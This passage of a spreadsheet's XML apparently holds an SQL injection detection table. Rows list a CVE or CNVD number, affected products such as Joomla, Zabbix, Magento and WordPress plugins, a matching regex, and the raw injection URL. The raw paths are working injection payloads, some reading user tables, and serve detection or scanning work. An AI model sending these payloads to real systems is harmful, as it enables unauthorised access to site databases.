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tmp" sheetId="2" r:id="rId1"/>
    <sheet name="V4" sheetId="1" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">tmp!$A$1:$F$708</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'V4'!$A$1:$G$959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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="9465" uniqueCount="5402">
  <si>
    <t>组件</t>
  </si>
  <si>
    <t>漏洞类型</t>
  </si>
  <si>
    <t>漏洞编号</t>
  </si>
  <si>
    <t>漏洞中文名称</t>
  </si>
  <si>
    <t>正则字符串(直接复制)</t>
  </si>
  <si>
    <t>所有路径(原始)</t>
  </si>
  <si>
    <t>大华</t>
  </si>
  <si>
    <t>SQL注入</t>
  </si>
  <si>
    <t>CNVD-2017-06001</t>
  </si>
  <si>
    <t>.*?(?:/portal/attachment_clearTempFile\.action\?bean\.RecId=1'\) AND EXTRACTVALUE\(534543,CONCAT\(0x5c,md5\(.*?\),0x5c\)\) AND \('n72Yk'='n72Yk&amp;bean\.TabName=1|/portal/attachment_getAttList\.action\?bean\.RecId=1'\) AND EXTRACTVALUE\(534543,CONCAT\(0x5c,md5\(.*?\),0x5c\)\) AND \('n72Yk'='n72Yk&amp;bean\.TabName=1).*</t>
  </si>
  <si>
    <t>/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&amp;bean.TabName=1|/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&amp;bean.TabName=1</t>
  </si>
  <si>
    <t>宏景</t>
  </si>
  <si>
    <t>CNVD-2023-08743</t>
  </si>
  <si>
    <t>.*?(?:/servlet/codesettree\?flag=c&amp;status=1&amp;codesetid=1&amp;parentid=-1&amp;categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d).*</t>
  </si>
  <si>
    <t>/servlet/codesettree?flag=c&amp;status=1&amp;codesetid=1&amp;parentid=-1&amp;categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d</t>
  </si>
  <si>
    <t>Gogs (Go Git Service)</t>
  </si>
  <si>
    <t>CVE-2014-8682</t>
  </si>
  <si>
    <t>.*?(?:/api/v1/repos/search\?q=%27\)%09UNION%09SELECT%09\*%09FROM%09\(SELECT%09null\)%09AS%09a1%09%09JOIN%09\(SELECT%091\)%09as%09u%09JOIN%09\(SELECT%09user\(\)\)%09AS%09b1%09JOIN%09\(SELECT%09user\(\)\)%09AS%09b2%09JOIN%09\(SELECT%09null\)%09as%09a3%09%09JOIN%09\(SELECT%09null\)%09as%09a4%09%09JOIN%09\(SELECT%09null\)%09as%09a5%09%09JOIN%09\(SELECT%09null\)%09as%09a6%09%09JOIN%09\(SELECT%09null\)%09as%09a7%09%09JOIN%09\(SELECT%09null\)%09as%09a8%09%09JOIN%09\(SELECT%09null\)%09as%09a9%09JOIN%09\(SELECT%09null\)%09as%09a10%09JOIN%09\(SELECT%09null\)%09as%09a11%09JOIN%09\(SELECT%09null\)%09as%09a12%09JOIN%09\(SELECT%09null\)%09as%09a13%09%09JOIN%09\(SELECT%09null\)%09as%09a14%09%09JOIN%09\(SELECT%09null\)%09as%09a15%09%09JOIN%09\(SELECT%09null\)%09as%09a16%09%09JOIN%09\(SELECT%09null\)%09as%09a17%09%09JOIN%09\(SELECT%09null\)%09as%09a18%09%09JOIN%09\(SELECT%09null\)%09as%09a19%09%09JOIN%09\(SELECT%09null\)%09as%09a20%09%09JOIN%09\(SELECT%09null\)%09as%09a21%09%09JOIN%09\(SELECT%09null\)%09as%09a22%09where%09\(%27%25%27=%27).*</t>
  </si>
  <si>
    <t>/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27</t>
  </si>
  <si>
    <t>Joomla</t>
  </si>
  <si>
    <t>CVE-2015-7297</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_contenthistory&amp;view=history&amp;list\[ordering\]=&amp;item_id=1&amp;type_id=1&amp;list\[select\]=updatexml\(0x23,concat\(1,md5\(.*?\)\),1\)).*</t>
  </si>
  <si>
    <t>/index.php?option=com_contenthistory&amp;view=history&amp;list[ordering]=&amp;item_id=1&amp;type_id=1&amp;list[select]=updatexml(0x23,concat(1,md5({{num}})),1)</t>
  </si>
  <si>
    <t>Zabbix</t>
  </si>
  <si>
    <t>CVE-2016-10134</t>
  </si>
  <si>
    <t>.*?(?:/jsrpc\.php\?type=0&amp;mode=1&amp;method=screen\.get&amp;profileIdx=web\.item\.graph&amp;resourcetype=17&amp;profileIdx2=updatexml\(0,concat\(0xa,user\(\)\),0\)::).*</t>
  </si>
  <si>
    <t>/jsrpc.php?type=0&amp;mode=1&amp;method=screen.get&amp;profileIdx=web.item.graph&amp;resourcetype=17&amp;profileIdx2=updatexml(0,concat(0xa,user()),0)::</t>
  </si>
  <si>
    <t>织梦</t>
  </si>
  <si>
    <t>CVE-2017-17731</t>
  </si>
  <si>
    <t>.*?(?:/plus/recommend\.php\?action=&amp;aid=1&amp;_FILES\[type\]\[tmp_name\]=%27%20or%20mid=@`%27`%20/\*!50000union\*//\*!50000select\*/1,2,3,md5\(.*?\),5,6,7,8,9%23@`%27`\+&amp;_FILES\[type\]\[name\]=1\.jpg&amp;_FILES\[type\]\[type\]=application/octet-stream&amp;_FILES\[type\]\[size\]=4294).*</t>
  </si>
  <si>
    <t>/plus/recommend.php?action=&amp;aid=1&amp;_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&amp;_FILES[type][name]=1.jpg&amp;_FILES[type][type]=application/octet-stream&amp;_FILES[type][size]=4294</t>
  </si>
  <si>
    <t>CVE-2017-8917</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_fields&amp;view=fields&amp;layout=modal&amp;list\[fullordering\]=updatexml\(0x23,concat\(1,md5\(.*?\)\),1\)).*</t>
  </si>
  <si>
    <t>/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)</t>
  </si>
  <si>
    <t>SubrionCMS</t>
  </si>
  <si>
    <t>CVE-2017-11444</t>
  </si>
  <si>
    <t>.*?(?:/search/members/\?id`%3D520\)%2f\*\*%2funion%2f\*\*%2fselect%2f\*\*%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27.*?%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1).*</t>
  </si>
  <si>
    <t>/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1</t>
  </si>
  <si>
    <t>CVE-2018-7314</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_prayercenter&amp;task=confirm&amp;id=1&amp;sessionid=1' AND EXTRACTVALUE\(22,CONCAT\(0x7e,md5\(.*?\)\)\)- X).*</t>
  </si>
  <si>
    <t>/index.php?option=com_prayercenter&amp;task=confirm&amp;id=1&amp;sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))- X</t>
  </si>
  <si>
    <t>CVE-2018-6605</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_zhbaidumap&amp;no_html=1&amp;format=raw&amp;task=getPlacemarkDetails).*</t>
  </si>
  <si>
    <t>/index.php?option=com_zhbaidumap&amp;no_html=1&amp;format=raw&amp;task=getPlacemarkDetails</t>
  </si>
  <si>
    <t>CVE-2018-17254</t>
  </si>
  <si>
    <t>.*?(?:/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links\.php\?extension=menu&amp;view=menu&amp;parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS\(0x203a20,USER\(\),DATABASE\(\),VERSION\(\),md5\(.*?\)\),NULL,NULL,NULL,NULL,NULL--%20aa).*</t>
  </si>
  <si>
    <t>/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&amp;view=menu&amp;parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa</t>
  </si>
  <si>
    <t>NagiosXI</t>
  </si>
  <si>
    <t>CVE-2018-10736</t>
  </si>
  <si>
    <t>.*?(?:/nagiosql/admin/info\.php\?key1=%27%20union%20select%20concat\(md5\(.*?\)\)%23).*</t>
  </si>
  <si>
    <t>/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23</t>
  </si>
  <si>
    <t>CVE-2018-10735</t>
  </si>
  <si>
    <t>.*?(?:/nagiosql/admin/commandline\.php\?cname=%27%20union%20select%20concat\(md5\(.*?\)\)%23).*</t>
  </si>
  <si>
    <t>/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23</t>
  </si>
  <si>
    <t xml:space="preserve">Lansweeper </t>
  </si>
  <si>
    <t>CVE-2019-13462</t>
  </si>
  <si>
    <t>.*?(?:/WidgetHandler\.ashx\?MethodName=Sort&amp;ID=1&amp;row=1&amp;column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29).*</t>
  </si>
  <si>
    <t>/WidgetHandler.ashx?MethodName=Sort&amp;ID=1&amp;row=1&amp;column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29</t>
  </si>
  <si>
    <t>Magento</t>
  </si>
  <si>
    <t>CVE-2019-7139</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/catalog/product_frontend_action/synchronize\?type_id=recently_products&amp;ids\[0\]\[added_at\]=&amp;ids\[0\]\[product_id\]\[from\]=\?&amp;ids\[0\]\[product_id\]\[to\]=\)\)\)%20OR%20\(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0\)%20--%20-|/catalog/product_frontend_action/synchronize\?type_id=recently_products&amp;ids\[0\]\[added_at\]=&amp;ids\[0\]\[product_id\]\[from\]=\?&amp;ids\[0\]\[product_id\]\[to\]=\)\)\)%20OR%20\(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1\)%20--%20- </t>
  </si>
  <si>
    <t>/catalog/product_frontend_action/synchronize?type_id=recently_products&amp;ids[0][added_at]=&amp;ids[0][product_id][from]=?&amp;ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20-|/|/catalog/product_frontend_action/synchronize?type_id=recently_products&amp;ids[0][added_at]=&amp;ids[0][product_id][from]=?&amp;ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20-</t>
  </si>
  <si>
    <t>米拓</t>
  </si>
  <si>
    <t>CVE-2019-17418</t>
  </si>
  <si>
    <t>.*?(?:/admin/\?n=language&amp;c=language_general&amp;a=doSearchParameter&amp;editor=cn&amp;word=search&amp;appno=0\+union\+select\+98989\*443131,1--\+&amp;site=admin).*</t>
  </si>
  <si>
    <t>/admin/?n=language&amp;c=language_general&amp;a=doSearchParameter&amp;editor=cn&amp;word=search&amp;appno=0+union+select+98989*443131,1--+&amp;site=admin</t>
  </si>
  <si>
    <t>CVE-2019-16996</t>
  </si>
  <si>
    <t>.*?(?:/admin/\?n=product&amp;c=product_admin&amp;a=dopara&amp;app_type=shop&amp;id=1%20union%20SELECT%201,2,3,25367\*75643,5,6,7%20limit%205,1%20%23).*</t>
  </si>
  <si>
    <t>/admin/?n=product&amp;c=product_admin&amp;a=dopara&amp;app_type=shop&amp;id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23\|/admin/?n=language&amp;c=language_general&amp;a=doExportPack</t>
  </si>
  <si>
    <t>PHPSHE</t>
  </si>
  <si>
    <t>CVE-2019-9762</t>
  </si>
  <si>
    <t>.*?(?:/include/plugin/payment/alipay/pay\.php\?id=pay%20where%201=1%20union%20select%201,2,CONCAT\(md5\(.*?\)\),4,5,6,7,8,9,10,11,12%23_).*</t>
  </si>
  <si>
    <t>/include/plugin/payment/alipay/pay.php?id=pay%20where%201=1%20union%20select%201,2,CONCAT(md5({{num}})),4,5,6,7,8,9,10,11,12%23_</t>
  </si>
  <si>
    <t>Teclib GLPI</t>
  </si>
  <si>
    <t>CVE-2019-10232</t>
  </si>
  <si>
    <t>.*?(?:/glpi/scripts/unlock_tasks\.php\?cycle=1%20UNION%20ALL%20SELECT%201,\(@@version\)--%20&amp;only_tasks=1|/scripts/unlock_tasks\.php\?cycle=1%20UNION%20ALL%20SELECT%201,\(@@version\)--%20&amp;only_tasks=1).*</t>
  </si>
  <si>
    <t>/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&amp;only_tasks=1|/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&amp;only_tasks=1</t>
  </si>
  <si>
    <t>WordPress</t>
  </si>
  <si>
    <t>CVE-2019-10692</t>
  </si>
  <si>
    <t>.*?(?:/\?rest_route=/wpgmza/v1/markers&amp;filter=%7b%7d&amp;fields=%2a%20from%20wp_users--%20-).*</t>
  </si>
  <si>
    <t>/?rest_route=/wpgmza/v1/markers&amp;filter=%7b%7d&amp;fields=%2a%20from%20wp_users--%20-</t>
  </si>
  <si>
    <t>Artica Web Proxy</t>
  </si>
  <si>
    <t>CVE-2020-17506</t>
  </si>
  <si>
    <t>.*?(?:/fw\.login\.php\?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;).*</t>
  </si>
  <si>
    <t>/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;</t>
  </si>
  <si>
    <t>微擎</t>
  </si>
  <si>
    <t>CVE-2020-20300</t>
  </si>
  <si>
    <t>.*?(?:/public/index\.php/home/index/bind_follow/\?publicid=1&amp;is_ajax=1&amp;uid\[0\]=exp&amp;uid\[1\]=\)%20and%20updatexml\(1,concat\(0x7e,md5\('999999'\),0x7e\),1\)--\+).*</t>
  </si>
  <si>
    <t>/public/index.php/home/index/bind_follow/?publicid=1&amp;is_ajax=1&amp;uid[0]=exp&amp;uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+</t>
  </si>
  <si>
    <t>CVE-2020-14092</t>
  </si>
  <si>
    <t>.*?(?:/\?cffaction=get_data_from_database&amp;query=SELECT%20\*%20from%20wp_users).*</t>
  </si>
  <si>
    <t>/?cffaction=get_data_from_database&amp;query=SELECT%20*%20from%20wp_users</t>
  </si>
  <si>
    <t>Chamilo model</t>
  </si>
  <si>
    <t>CVE-2021-34187</t>
  </si>
  <si>
    <t>.*?(?:/main/inc/ajax/model\.ajax\.php\?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_search=1&amp;searchField=1\)\)and\(1\)%20UNION%20ALL%20SELECT%20CONCAT\(\(select\+extractvalue\(0x0a,concat\(0x0a,\(md5\(.*?\)\)\)\)\)\),NULL,NULL,NULL--%20-\)and\(\(1=&amp;searchOper=ni&amp;searchString=testx&amp;filters2=\{\}&amp;from_course_session=0|/main/inc/ajax/model\.ajax\.php\?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_search=1&amp;searchField=1\)\)and\(1\)%20UNION%20ALL%20SELECT%20CONCAT\(\(select\+md5\(.*?\)\)\),NULL,NULL,NULL--%20-\)and\(\(1=&amp;searchOper=ni&amp;searchString=testx&amp;filters2=\{\}&amp;from_course_session=0).*</t>
  </si>
  <si>
    <t>/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_search=1&amp;searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+md5({{num}}))),NULL,NULL,NULL--%20-)and((1=&amp;searchOper=ni&amp;searchString=testx&amp;filters2={}&amp;from_course_session=0|/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&amp;work_id=1&amp;rows=0&amp;page=1&amp;sidx=0&amp;sord=test&amp;_search=1&amp;searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(md5({{num}})))))),NULL,NULL,NULL--%20-)and((1=&amp;searchOper=ni&amp;searchString=testx&amp;filters2={}&amp;from_course_session=0</t>
  </si>
  <si>
    <t>Layer Meshery</t>
  </si>
  <si>
    <t>CVE-2021-31856</t>
  </si>
  <si>
    <t>.*?(?:/api/experimental/patternfile\?order=id%3Bselect\(md5\(.*?\)\)&amp;page=0&amp;page_size=0).*</t>
  </si>
  <si>
    <t>/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&amp;page=0&amp;page_size=0</t>
  </si>
  <si>
    <t>PrestaHome Blog for PrestaShop</t>
  </si>
  <si>
    <t>CVE-2021-36748</t>
  </si>
  <si>
    <t>.*?(?:/module/ph_simpleblog/list\?sb_category='\)%20AND%20false--%20-|/module/ph_simpleblog/list\?sb_category='\)%20OR%20true--%20-).*</t>
  </si>
  <si>
    <t>/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-|/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-</t>
  </si>
  <si>
    <t>PrestaShop</t>
  </si>
  <si>
    <t>CVE-2021-37538</t>
  </si>
  <si>
    <t>.*?(?:/module/smartblog/archive\?month=1&amp;year=1&amp;day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\(SELECT%20MD5\(55555\)\),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-).*</t>
  </si>
  <si>
    <t>/module/smartblog/archive?month=1&amp;year=1&amp;day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-</t>
  </si>
  <si>
    <t>WooCommerce</t>
  </si>
  <si>
    <t>CVE-2021-32789</t>
  </si>
  <si>
    <t>.*?(?:/\?rest_route=/wc/store/products/collection-data&amp;calculate_attribute_counts\[0\]\[query_type\]=or&amp;calculate_attribute_counts\[0\]\[taxonomy\]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500).*</t>
  </si>
  <si>
    <t>/?rest_route=/wc/store/products/collection-data&amp;calculate_attribute_counts[0][query_type]=or&amp;calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500</t>
  </si>
  <si>
    <t>CVE-2021-24666</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?rest_route=/podlove/v1/social/services/contributor/1&amp;id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5\('CVE-2021-24666'\),NULL,NULL,NULL--%20-).*</t>
  </si>
  <si>
    <t>/index.php?rest_route=/podlove/v1/social/services/contributor/1&amp;id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-</t>
  </si>
  <si>
    <t>Casdoor</t>
  </si>
  <si>
    <t>CVE-2022-24124</t>
  </si>
  <si>
    <t>.*?(?:/api/get-organizations\?p=123&amp;pageSize=123&amp;value=cfx&amp;sortField=&amp;sortOrder=&amp;field=updatexml\(1,version\(\),1\)).*</t>
  </si>
  <si>
    <t>/api/get-organizations?p=123&amp;pageSize=123&amp;value=cfx&amp;sortField=&amp;sortOrder=&amp;field=updatexml(1,version(),1)</t>
  </si>
  <si>
    <t>MapSVG</t>
  </si>
  <si>
    <t>CVE-2022-0592</t>
  </si>
  <si>
    <t>.*?(?:/wp-json/mapsvg/v1/maps/2\?id=1%27%20AND%20\(SELECT%2042%20FROM%20\(SELECT\(SLEEP\(6\)\)\)b\)--\+).*</t>
  </si>
  <si>
    <t>/wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)--+</t>
  </si>
  <si>
    <t>Microfinance Management System</t>
  </si>
  <si>
    <t>CVE-2022-27927</t>
  </si>
  <si>
    <t>.*?(?:/mims/updatecustomer\.php\?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT\(md5\(.*?\),1,2\),NULL,NULL,NULL,NULL,NULL,NULL').*</t>
  </si>
  <si>
    <t>/mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL'</t>
  </si>
  <si>
    <t>Online Fire Reporting System</t>
  </si>
  <si>
    <t>CVE-2022-31974</t>
  </si>
  <si>
    <t>.*?(?:/admin/\?page=reports&amp;date=2022-05-27%27%20union%20select%201,2,3,md5\('.*?'\),5,6,7,8,9,10--\+).*\|.*?(?:/admin/\?page=user/manage_user&amp;id=-6%27%20union%20select%201,md5\('.*?'\),3,4,5,6,7,8,9,10,11--\+).*|.*?(?:/admin/requests/take_action\.php\?id=6'\+UNION\+ALL\+SELECT\+md5\('.*?'\),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\+-).*</t>
  </si>
  <si>
    <t>/admin/?page=reports&amp;date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+\|/admin/?page=user/manage_user&amp;id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+|/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-</t>
  </si>
  <si>
    <t>Photo Gallery</t>
  </si>
  <si>
    <t>CVE-2022-0169</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=bwg_frontend_data&amp;shortcode_id=1&amp;bwg_tag_id_bwg_thumbnails_0\[\]=\)%22%20union%20select%201,2,3,4,5,6,7,concat\(md5\(.*?\),%200x2c,%208\),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=bwg_frontend_data&amp;shortcode_id=1&amp;bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g</t>
  </si>
  <si>
    <t>PHPJabbers</t>
  </si>
  <si>
    <t>CVE-2023-40748</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27\)\+OR\+6100%3d6100%23%26type%3d).*\|.*?(?:/index\.php\?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d\(SELECT\+\(CASE\+WHEN\+\(4213%3d4213\)\+THEN\+0x63726561746564\+ELSE\+\(SELECT\+7877\+UNION\+SELECT\+7153\)\+END\)\)%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d’’%26type%3d).*</t>
  </si>
  <si>
    <t>/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d\|/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d’’%26type%3d</t>
  </si>
  <si>
    <t>Purchase Order Management</t>
  </si>
  <si>
    <t>CVE-2023-2130</t>
  </si>
  <si>
    <t>.*?(?:/admin/suppliers/view_details\.php\?id=1'\+AND\+\(SELECT\+9687\+FROM\+\(SELECT\(SLEEP\(6\)\)\)pnac\)\+AND\+'ARHJ'='ARHJ).*</t>
  </si>
  <si>
    <t>/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ</t>
  </si>
  <si>
    <t>CyberPower</t>
  </si>
  <si>
    <t>CVE-2024-32737</t>
  </si>
  <si>
    <t>.*?(?:/api/v1/confup\?mode=lean&amp;uid=1'%20UNION%20select%201,2,3,sqlite_version\(\);--).*\|.*?(?:/api/v1/ndconfig\?mode=lean&amp;uid=1'%20UNION%20select%201,2,3,sqlite_version\(\);--).*</t>
  </si>
  <si>
    <t>/api/v1/confup?mode=lean&amp;uid=1'%20UNION%20select%201,2,3,sqlite_version();--\|/api/v1/ndconfig?mode=lean&amp;uid=1'%20UNION%20select%201,2,3,sqlite_version();--</t>
  </si>
  <si>
    <t>Exrick XMall</t>
  </si>
  <si>
    <t>CVE-2024-24112</t>
  </si>
  <si>
    <t>.*?(?:/item/list\?draw=1&amp;order%5B0%5D%5Bcolumn%5D=1&amp;order%5B0%5D%5Bdir%5D=desc\)a\+union\+select\+updatexml\(1,concat\(0x7e,.*?,0x7e\),1\)%23;&amp;start=0&amp;length=1&amp;search%5Bvalue%5D=&amp;search%5Bregex%5D=false&amp;cid=-1&amp;_=1).*</t>
  </si>
  <si>
    <t>/item/list?draw=1&amp;order%5B0%5D%5Bcolumn%5D=1&amp;order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&amp;start=0&amp;length=1&amp;search%5Bvalue%5D=&amp;search%5Bregex%5D=false&amp;cid=-1&amp;_=1</t>
  </si>
  <si>
    <t>Riello Netman</t>
  </si>
  <si>
    <t>CVE-2024-8877</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/db_eventlog_w\.cgi\?date_start=0&amp;date_end=1715630160&amp;gravity=%25&amp;type=%25%27and/\*\*/%271%27=%271).*</t>
  </si>
  <si>
    <t>/cgi-bin/db_eventlog_w.cgi?date_start=0&amp;date_end=1715630160&amp;gravity=%25&amp;type=%25%27and/**/%271%27=%271</t>
  </si>
  <si>
    <t>CVE-2024-32709</t>
  </si>
  <si>
    <t>.*?(?:/account/\?user=1&amp;tab=groups&amp;group-name=p%27\+or\+%27%%27=%27%%27\+union\+all\+select\+1,2,3,4,5,6,7,8,9,10,11,concat\(%22Database:%22,md5\(.*?\),0x7c,%20%22Version:%22,version\(\)\),13--\+-).*</t>
  </si>
  <si>
    <t>/account/?user=1&amp;tab=groups&amp;group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+-</t>
  </si>
  <si>
    <t>CVE-2024-5522</t>
  </si>
  <si>
